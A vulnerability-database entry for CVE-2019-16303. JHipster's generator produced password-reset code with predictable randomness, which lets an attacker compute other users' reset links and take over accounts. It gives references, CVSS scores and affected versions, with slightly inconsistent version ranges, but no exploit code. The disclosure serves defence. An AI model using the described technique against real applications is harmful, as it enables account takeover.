CVE-2019-16303
CRITICALJHipster <6.3.0 & JHipster Kotlin <=1.1.0 - Privilege Escalation
Title source: llmDescription
A class generated by the Generator in JHipster before 6.3.0 and JHipster Kotlin through 1.1.0 produces code that uses an insecure source of randomness (apache.commons.lang3 RandomStringUtils). This allows an attacker (if able to obtain their own password reset URL) to compute the value for all other password resets for other accounts, thus allowing privilege escalation or account takeover.
References (8)
Core 8
Core References
Third Party Advisory x_refsource_misc
https://github.com/jhipster/generator-jhipster/security/advisories/GHSA-mwp6-j9wf-968c
Exploit, Issue Tracking, Third Party Advisory x_refsource_misc
https://github.com/jhipster/generator-jhipster/issues/10401
Patch, Third Party Advisory x_refsource_misc
https://github.com/jhipster/generator-jhipster/commit/88448b85fd3e8e49df103f0061359037c2c68ea7
Exploit, Issue Tracking, Third Party Advisory x_refsource_misc
https://github.com/jhipster/jhipster-kotlin/issues/183
Release Notes, Vendor Advisory x_refsource_misc
https://www.jhipster.tech/2019/09/13/jhipster-release-6.3.0.html
Mailing List mailing-list
x_refsource_mlist
https://lists.apache.org/thread.html/r6d243e7e3f25daeb242dacf3def411fba32a9388d3ff84918cb28ddd%40%3Cissues.commons.apache.org%3E
Mailing List mailing-list
x_refsource_mlist
https://lists.apache.org/thread.html/rc87fa35a48b5d70b06af6fb81785ed82e82686eb83307aae6d250dc9%40%3Cissues.commons.apache.org%3E
Mailing List mailing-list
x_refsource_mlist
https://lists.apache.org/thread.html/rc3f00f5d3d2ec0e2381a3b9096d5f5b4d46ec1587ee7e251a3dbb897%40%3Cissues.commons.apache.org%3E
Scores
CVSS v3
9.8
EPSS
0.0367
EPSS Percentile
88.2%
Attack Vector
NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Details
CWE
CWE-338
Status
published
Products (3)
jhipster/jhipster
< 6.3.0
jhipster/jhipster_kotlin
< 1.1.0
npm/generator-jhipster-kotlin
0 - 1.2.0npm
Published
Sep 14, 2019
Tracked Since
Feb 18, 2026